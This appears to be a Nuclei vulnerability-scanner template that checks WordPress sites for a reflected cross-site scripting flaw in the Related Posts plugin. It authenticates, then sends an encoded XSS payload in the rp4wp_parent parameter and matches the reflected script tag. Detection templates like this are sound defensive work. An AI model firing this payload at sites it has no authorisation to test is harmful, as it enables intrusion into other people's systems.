nuclei-templates/http/vulnerabilities/wordpress/wp-related-post-xss.yaml

50 lines
1.4 KiB
YAML

id: wp-related-post-xss
info:
name: WordPress Related Posts <= 2.1.1 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
WordPress Related Posts plugin before 2.1.1 contains an Reflected XSS via rp4wp_parent
reference:
- https://huntr.dev/bounties/7c9bd2d2-2a6f-420c-a45e-716600cf810e/
- https://wordpress.org/plugins/wordpress-23-related-posts-plugin/advanced/
metadata:
verified: true
max-request: 2
tags: wp-plugin,xss,relatedposts,authenticated,huntr,wordpress,wp
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=rp4wp_link_related&rp4wp_parent=156x%27%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src=x onerror=alert(document.domain)>&action=edit'
- 'All Posts</a>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022070ff99542e1fcfb880eba8afc8e3ffda0a2600e65dfb35c32d29d592c8522f4b022100fb265d69b091dac8131a5a835ce5c02663ecf8551e23e8225a69f9256a4c5739:922c64590222798bb761d5b6d8e72950